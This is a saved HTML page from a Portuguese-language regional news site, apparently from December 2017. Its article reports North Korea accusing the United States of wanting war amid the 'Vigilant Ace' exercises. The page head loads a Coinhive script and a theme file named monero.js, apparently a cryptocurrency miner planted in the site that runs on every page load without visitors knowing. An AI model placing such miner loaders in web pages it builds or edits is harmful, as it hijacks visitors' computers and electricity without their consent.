

<!DOCTYPE html>
<html class="no-js" lang="pt-BR">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://oiguassu.com/xmlrpc.php" />
<title>COREIA DO NORTE ACUSA OS ESTADOS UNIDOS DE QUERER PROVOCAR UMA GUERRA</title>

	<!-- Meta Tag Manager -->
	<meta http-equiv="pragma" content="no-cache" />
	<!-- / Meta Tag Manager -->
<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//s.gravatar.com' />
<link rel='dns-prefetch' href='//coinhive.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Feed para  &raquo;" href="http://oiguassu.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para  &raquo;" href="http://oiguassu.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para  &raquo; COREIA DO NORTE ACUSA OS ESTADOS UNIDOS DE QUERER PROVOCAR UMA GUERRA" href="http://oiguassu.com/coreia-do-norte-acusa-os-estados-unidos-de-querer-provocar-uma-guerra/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/oiguassu.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.4"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,56826,8203,55356,56819),0,0),c=j.toDataURL(),b!==c&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55358,56794,8205,9794,65039),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55358,56794,8203,9794,65039),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='mh-style-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/style.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='mh-font-awesome-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/includes/font-awesome.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='mh-google-fonts-css'  href='https://fonts.googleapis.com/css?family=PT+Serif:300,400,400italic,600,700%7cOswald:300,400,400italic,600,700' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/css/jetpack.css?ver=5.4' type='text/css' media='all' />
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/modules/related-posts/related-posts.js?ver=20150408'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/scripts.js?ver=4.8.4'></script>
<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?ver=4.8.4'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/monero.js?ver=4.8.4'></script>
<link rel='https://api.w.org/' href='http://oiguassu.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://oiguassu.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://oiguassu.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='PECÚLIO: EX-SECRETÁRIO E EMPRESÁRIOS SÃO CONDENADOS POR CRIMES CONTRA A LEI DE LICITAÇÕES, CORRUPÇÃO E FALSIDADE IDEOLÓGICA' href='http://oiguassu.com/peculio-ex-secretario-e-empresarios-sao-condenados-por-crimes-contra-a-lei-de-licitacoes-corrupcao-e-falsidade-ideologica/' />
<meta name="generator" content="WordPress 4.8.4" />
<link rel="canonical" href="http://oiguassu.com/coreia-do-norte-acusa-os-estados-unidos-de-querer-provocar-uma-guerra/" />
<link rel='shortlink' href='http://wp.me/pS5BS-1mv' />
<link rel="alternate" type="application/json+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Fcoreia-do-norte-acusa-os-estados-unidos-de-querer-provocar-uma-guerra%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Fcoreia-do-norte-acusa-os-estados-unidos-de-querer-provocar-uma-guerra%2F&#038;format=xml" />
		<a href="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></a>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9260427313362027",
    enable_page_level_ads: true
  });
</script>

<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<style type='text/css'>img#wpstats{display:none}</style>	<style type="text/css">
    	    		.social-nav a:hover, .logo-title, .entry-content a, a:hover, .entry-meta .entry-meta-author, .entry-meta a, .comment-info, blockquote, .pagination a:hover .pagelink { color: #019100; }
			.main-nav li:hover, .slicknav_menu, .ticker-title, .breadcrumb a, .breadcrumb .bc-text, .button span, .widget-title span, input[type=submit], table th, .comment-section-title .comment-count, #cancel-comment-reply-link:hover, .pagination .current, .pagination .pagelink { background: #019100; }
			blockquote, input[type=text]:hover, input[type=email]:hover, input[type=tel]:hover, input[type=url]:hover, textarea:hover { border-color: #019100; }
    	    	    				.main-nav, .main-nav ul li:hover > ul, .mh-footer { background: #019100; }
    	    	    	    		</style>
    <!--[if lt IE 9]>
<script src="http://oiguassu.com/wp-content/themes/mh_newsdesk/js/css3-mediaqueries.js"></script>
<![endif]-->
<meta name="description" content="A Coreia do Norte acusou, nesta quinta-feira (7), os Estados Unidos (EUA) de querer provocar uma guerra na Península Coreana. &quot;Os comentários negligentes de guerra do círculo interno do presidente americano Donald Trump e os movimentos militares temerários dos EUA corroboram que o atual governo decidiu provocar uma guerra na Península Coreana&quot;, disse um porta-voz&hellip;" />

<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="COREIA DO NORTE ACUSA OS ESTADOS UNIDOS DE QUERER PROVOCAR UMA GUERRA" />
<meta property="og:url" content="http://oiguassu.com/coreia-do-norte-acusa-os-estados-unidos-de-querer-provocar-uma-guerra/" />
<meta property="og:description" content="A Coreia do Norte acusou, nesta quinta-feira (7), os Estados Unidos (EUA) de querer provocar uma guerra na Península Coreana. &#8220;Os comentários negligentes de guerra do círculo interno do presi…" />
<meta property="article:published_time" content="2017-12-07T13:04:24+00:00" />
<meta property="article:modified_time" content="2017-12-07T13:05:22+00:00" />
<meta property="og:image" content="http://oiguassu.com/wp-content/uploads/2017/12/maxresdefault-1.jpg" />
<meta property="og:image:width" content="1280" />
<meta property="og:image:height" content="720" />
<meta property="og:locale" content="pt_BR" />
<meta name="twitter:site" content="@OIguassuDigital" />
<meta name="twitter:image" content="http://oiguassu.com/wp-content/uploads/2017/12/maxresdefault-1.jpg?w=640" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:creator" content="@OIguassuDigital" />
</head>
<body class="post-template-default single single-post postid-5239 single-format-standard mh-right-sb">
<div id="mh-wrapper">
<header class="mh-header">
	<div class="header-wrap clearfix">
				<div class="mh-col mh-1-3 header-logo-full">
			<a href="http://oiguassu.com/" title="" rel="home">
<div class="logo-wrap" role="banner">
<img src="http://oiguassu.com/wp-content/uploads/2017/08/cropped-Sem-Título-1-1.jpg" height="150" width="500" alt="" />
<div class="logo">
</div>
</div>
</a>
		</div>
			</div>
	<div class="header-menu clearfix">
		<nav class="main-nav clearfix">
			<div class="menu-menu-container"><ul id="menu-menu" class="menu"><li id="menu-item-90" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-90"><a href="http://oiguassu.com">Início</a></li>
<li id="menu-item-91" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-91"><a href="http://oiguassu.com/category/foz/">Foz do Iguaçu</a></li>
<li id="menu-item-92" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-92"><a href="http://oiguassu.com/category/parana/">Paraná</a></li>
<li id="menu-item-93" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-93"><a href="http://oiguassu.com/category/brasil/">Brasil</a></li>
<li id="menu-item-94" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-94"><a href="http://oiguassu.com/category/argentina/">Argentina</a></li>
<li id="menu-item-95" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-95"><a href="http://oiguassu.com/category/paraguay/">Paraguay</a></li>
<li id="menu-item-96" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-96"><a href="http://oiguassu.com/category/latinoamerica/">Latinoamerica</a></li>
<li id="menu-item-97" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-97"><a href="http://oiguassu.com/category/colunas/">Colunas</a></li>
</ul></div>		</nav>
		<div class="header-sub clearfix">
							<div id="ticker" class="news-ticker mh-col mh-2-3 clearfix">
			<span class="ticker-title">
			Hot Topics		</span>
		<ul class="ticker-content">			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/coreia-do-norte-acusa-os-estados-unidos-de-querer-provocar-uma-guerra/" title="COREIA DO NORTE ACUSA OS ESTADOS UNIDOS DE QUERER PROVOCAR UMA GUERRA">
					<span class="ticker-item-date">dezembro 7, 2017</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">COREIA DO NORTE ACUSA OS ESTADOS UNIDOS DE QUERER PROVOCAR UMA GUERRA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/peculio-ex-secretario-e-empresarios-sao-condenados-por-crimes-contra-a-lei-de-licitacoes-corrupcao-e-falsidade-ideologica/" title="PECÚLIO: EX-SECRETÁRIO E EMPRESÁRIOS SÃO CONDENADOS POR CRIMES CONTRA A LEI DE LICITAÇÕES, CORRUPÇÃO E FALSIDADE IDEOLÓGICA">
					<span class="ticker-item-date">dezembro 7, 2017</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">PECÚLIO: EX-SECRETÁRIO E EMPRESÁRIOS SÃO CONDENADOS POR CRIMES CONTRA A LEI DE LICITAÇÕES, CORRUPÇÃO E FALSIDADE IDEOLÓGICA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/policia-prende-rogerio-157-um-dos-traficantes-mais-procurados-do-rio/" title="POLÍCIA PRENDE ROGÉRIO 157, UM DOS TRAFICANTES MAIS PROCURADOS DO RIO">
					<span class="ticker-item-date">dezembro 6, 2017</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">POLÍCIA PRENDE ROGÉRIO 157, UM DOS TRAFICANTES MAIS PROCURADOS DO RIO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/mais-de-27-000-pessoas-sao-evacuadas-apos-um-incendio-no-sul-da-california/" title="MAIS DE 27.000 PESSOAS SÃO EVACUADAS APÓS UM INCÊNDIO NO SUL DA CALIFÓRNIA">
					<span class="ticker-item-date">dezembro 6, 2017</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">MAIS DE 27.000 PESSOAS SÃO EVACUADAS APÓS UM INCÊNDIO NO SUL DA CALIFÓRNIA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/justica-anula-multa-contra-defesa-de-advogado-de-ex-vereador-cassado-em-foz/" title="JUSTIÇA ANULA MULTA CONTRA DEFESA DE ADVOGADO DE EX-VEREADOR CASSADO EM FOZ">
					<span class="ticker-item-date">dezembro 6, 2017</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">JUSTIÇA ANULA MULTA CONTRA DEFESA DE ADVOGADO DE EX-VEREADOR CASSADO EM FOZ</span>
				</a>
			</li>	</ul>
</div>						<aside class="mh-col mh-1-3 header-search">
				<form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form>			</aside>
		</div>
	</div>
</header><div class="mh-section mh-group">
	<div id="main-content" class="mh-content"><nav class="breadcrumb"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com" itemprop="url" class="bc-home"><span itemprop="title">Home</span></a></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com/category/internacional/" itemprop="url"><span itemprop="title">Internacional</span></a></span></nav>
<article id="post-5239" class="post-5239 post type-post status-publish format-standard has-post-thumbnail hentry category-internacional tag-manchete2">
	<header class="entry-header clearfix">
		<h1 class="entry-title">
			COREIA DO NORTE ACUSA OS ESTADOS UNIDOS DE QUERER PROVOCAR UMA GUERRA		</h1>
		<div class="entry-tags clearfix"><span>TOPICS:</span><a href="http://oiguassu.com/tag/manchete2/" rel="tag">manchete2</a></div>	</header>
	
<div class="entry-thumbnail">
<img width="777" height="437" src="http://oiguassu.com/wp-content/uploads/2017/12/maxresdefault-1-777x437.jpg" class="attachment-content-single size-content-single wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2017/12/maxresdefault-1-777x437.jpg 777w, http://oiguassu.com/wp-content/uploads/2017/12/maxresdefault-1-300x169.jpg 300w, http://oiguassu.com/wp-content/uploads/2017/12/maxresdefault-1-768x432.jpg 768w, http://oiguassu.com/wp-content/uploads/2017/12/maxresdefault-1-1024x576.jpg 1024w, http://oiguassu.com/wp-content/uploads/2017/12/maxresdefault-1-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2017/12/maxresdefault-1-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2017/12/maxresdefault-1-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2017/12/maxresdefault-1-120x67.jpg 120w, http://oiguassu.com/wp-content/uploads/2017/12/maxresdefault-1.jpg 1280w" sizes="(max-width: 777px) 100vw, 777px" data-attachment-id="5242" data-permalink="http://oiguassu.com/coreia-do-norte-acusa-os-estados-unidos-de-querer-provocar-uma-guerra/maxresdefault-2/" data-orig-file="http://oiguassu.com/wp-content/uploads/2017/12/maxresdefault-1.jpg" data-orig-size="1280,720" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="maxresdefault" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2017/12/maxresdefault-1-300x169.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2017/12/maxresdefault-1-1024x576.jpg" /></div>
		<p class="entry-meta">
<span class="entry-meta-author vcard author">Posted By: <a class="fn" href="http://oiguassu.com/author/carlos/">Carlos Santos</a></span>
<span class="entry-meta-date updated">dezembro 7, 2017</span>
</p>
	<div class="entry-content clearfix">
		<h3 style="text-align: justify;">A Coreia do Norte acusou, nesta quinta-feira (7), os Estados Unidos (EUA) de querer provocar uma guerra na Península Coreana.</h3>
<p style="text-align: justify;"><em>&#8220;Os comentários negligentes de guerra do círculo interno do presidente americano Donald Trump e os movimentos militares temerários dos EUA corroboram que o atual governo decidiu provocar uma guerra na Península Coreana&#8221;</em>, disse um porta-voz do Ministério das Relações Exteriores norte-coreano à agência estatal KCNA.</p>
<p style="text-align: justify;">O governo da Coreia do Norte acredita que Washington optou pela estratégia de caminhar passo a passo para explodir o conflito e que o que pode ser perguntado agora é <em>&#8220;quando explodirá a guerra&#8221;</em>?</p>
<p style="text-align: justify;">O porta-voz do Ministério da Coreia do Norte afirmou: <em>&#8220;não desejamos uma guerra, mas não fugiremos dela&#8221;</em> e advertiu os EUA de que <em>&#8220;pagarão caro&#8221;</em> por provocar um conflito com sua <em>&#8220;poderosa força nuclear, que fortalecemos constantemente&#8221;.</em></p>
<div id="attachment_5241" style="width: 310px" class="wp-caption alignleft"><a href="http://oiguassu.com/wp-content/uploads/2017/12/O-exercício-“Vigilant-Ace”2.jpg"><img data-attachment-id="5241" data-permalink="http://oiguassu.com/coreia-do-norte-acusa-os-estados-unidos-de-querer-provocar-uma-guerra/o-exercicio-vigilant-ace2/" data-orig-file="http://oiguassu.com/wp-content/uploads/2017/12/O-exercício-“Vigilant-Ace”2.jpg" data-orig-size="1280,721" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;Ronald Bradshaw&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;Hill Air Force Base F-35As fly in formation over the Utah Test and Training Range, March 30, 2017. (U.S. Air Force photo\/R. Nial Bradshaw)&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;Public Domain&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="O exercício “Vigilant Ace”2" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2017/12/O-exercício-“Vigilant-Ace”2-300x169.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2017/12/O-exercício-“Vigilant-Ace”2-1024x577.jpg" class="wp-image-5241 size-medium" src="http://oiguassu.com/wp-content/uploads/2017/12/O-exercício-“Vigilant-Ace”2-300x169.jpg" alt="" width="300" height="169" srcset="http://oiguassu.com/wp-content/uploads/2017/12/O-exercício-“Vigilant-Ace”2-300x169.jpg 300w, http://oiguassu.com/wp-content/uploads/2017/12/O-exercício-“Vigilant-Ace”2-768x433.jpg 768w, http://oiguassu.com/wp-content/uploads/2017/12/O-exercício-“Vigilant-Ace”2-1024x577.jpg 1024w, http://oiguassu.com/wp-content/uploads/2017/12/O-exercício-“Vigilant-Ace”2-777x437.jpg 777w, http://oiguassu.com/wp-content/uploads/2017/12/O-exercício-“Vigilant-Ace”2-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2017/12/O-exercício-“Vigilant-Ace”2-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2017/12/O-exercício-“Vigilant-Ace”2-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2017/12/O-exercício-“Vigilant-Ace”2-120x67.jpg 120w, http://oiguassu.com/wp-content/uploads/2017/12/O-exercício-“Vigilant-Ace”2.jpg 1280w" sizes="(max-width: 300px) 100vw, 300px" /></a><p class="wp-caption-text"><strong><em>              O exercício “Vigilant Ace”</em></strong></p></div>
<p style="text-align: justify;">Os comentários da chancelaria norte-coreana ocorrem em meio à realização das manobras aéreas anuais de Washington e Seul <em>&#8220;Vigilant ACE&#8221;</em>, as maiores até o momento, que se prolongarão até esta sexta-feira e que representam uma nova exibição de força diante do desafio armamentístico do regime liderado por Kim Jong-un.</p>
<p style="text-align: justify;">A tensão na Península da Coreia aumentou nos últimos meses, após o último teste nuclear norte-coreano em setembro e os lançamentos de mísseis balísticos, o mais recente e mais avançado na semana passada.</p>
<p style="text-align: justify;">O assessor de Segurança Nacional da Casa Branca, o tenente-general Herbert Raymond <em>&#8220;H.R.&#8221;</em> McMaster, disse recentemente que a possibilidade de uma guerra com a Coreia do Norte <em>&#8220;está aumentando a cada dia&#8221;</em>, enquanto o senador republicano Lindsey Graham pediu ao Pentágono para começar a repatriar as famílias dos militares americanos, alegando que o conflito com o Norte está se aproximando.</p>
<p style="text-align: justify;">O governo norte-coreano classificou hoje estes comentários de <em>&#8220;belicistas&#8221;</em>. Acrescentou que eles apenas podem ser interpretados como um aviso para que o país esteja preparado para uma guerra e que <em>&#8220;o mundo não deveria abrigar nenhum preconceito quando se trata de discernir quem está por trás da tensa situação&#8221;</em>.</p>
<p>&nbsp;</p>
<div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Compartilhe isso:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow" data-shared="sharing-twitter-5239" class="share-twitter sd-button share-icon no-text" href="http://oiguassu.com/coreia-do-norte-acusa-os-estados-unidos-de-querer-provocar-uma-guerra/?share=twitter" target="_blank" title="Clique para compartilhar no Twitter"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Twitter(abre em nova janela)</span></a></li><li class="share-facebook"><a rel="nofollow" data-shared="sharing-facebook-5239" class="share-facebook sd-button share-icon no-text" href="http://oiguassu.com/coreia-do-norte-acusa-os-estados-unidos-de-querer-provocar-uma-guerra/?share=facebook" target="_blank" title="Clique para compartilhar no Facebook"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Facebook(abre em nova janela)</span></a></li><li class="share-google-plus-1"><a rel="nofollow" data-shared="sharing-google-5239" class="share-google-plus-1 sd-button share-icon no-text" href="http://oiguassu.com/coreia-do-norte-acusa-os-estados-unidos-de-querer-provocar-uma-guerra/?share=google-plus-1" target="_blank" title="Compartilhe no Google+"><span></span><span class="sharing-screen-reader-text">Compartilhe no Google+(abre em nova janela)</span></a></li><li class="share-end"></li></ul></div></div></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Relacionado</em></h3>
</div>	</div>
	</article>		<h4 class="widget-title related-content-title">
			<span>Related Articles</span>
		</h4>
		<div class="related-content clearfix"><article class="mh-col mh-1-4 content-grid post-4275 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized tag-manchete2">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/educacao-ambiental-promove-seminario-no-7o-modulo-de-formacao-continuada/" title="EDUCAÇÃO AMBIENTAL PROMOVE SEMINÁRIO NO 7º MÓDULO DE FORMAÇÃO CONTINUADA"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2017/10/2-17-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2017/10/2-17-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2017/10/2-17-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2017/10/2-17-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2017/10/2-17-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="4276" data-permalink="http://oiguassu.com/educacao-ambiental-promove-seminario-no-7o-modulo-de-formacao-continuada/2-70/" data-orig-file="http://oiguassu.com/wp-content/uploads/2017/10/2-17.jpg" data-orig-size="500,313" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="2" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2017/10/2-17-300x188.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2017/10/2-17.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/uncategorized/" rel="category tag">Uncategorized</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/educacao-ambiental-promove-seminario-no-7o-modulo-de-formacao-continuada/" title="EDUCAÇÃO AMBIENTAL PROMOVE SEMINÁRIO NO 7º MÓDULO DE FORMAÇÃO CONTINUADA" rel="bookmark">
			EDUCAÇÃO AMBIENTAL PROMOVE SEMINÁRIO NO 7º MÓDULO DE FORMAÇÃO CONTINUADA		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-3309 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized tag-manchete2">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/lancada-oficialmente-a-campanha-outubro-rosa-em-foz-do-iguacu/" title="LANÇADA OFICIALMENTE A CAMPANHA OUTUBRO ROSA EM FOZ DO IGUAÇU"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2017/09/2-29-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2017/09/2-29-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2017/09/2-29-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2017/09/2-29-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2017/09/2-29-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="3310" data-permalink="http://oiguassu.com/lancada-oficialmente-a-campanha-outubro-rosa-em-foz-do-iguacu/2-51/" data-orig-file="http://oiguassu.com/wp-content/uploads/2017/09/2-29.jpg" data-orig-size="500,313" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="2" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2017/09/2-29-300x188.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2017/09/2-29.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/uncategorized/" rel="category tag">Uncategorized</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/lancada-oficialmente-a-campanha-outubro-rosa-em-foz-do-iguacu/" title="LANÇADA OFICIALMENTE A CAMPANHA OUTUBRO ROSA EM FOZ DO IGUAÇU" rel="bookmark">
			LANÇADA OFICIALMENTE A CAMPANHA OUTUBRO ROSA EM FOZ DO IGUAÇU		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-1012 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized tag-manchete2">
	<div class="content-thumb content-grid-thumb">
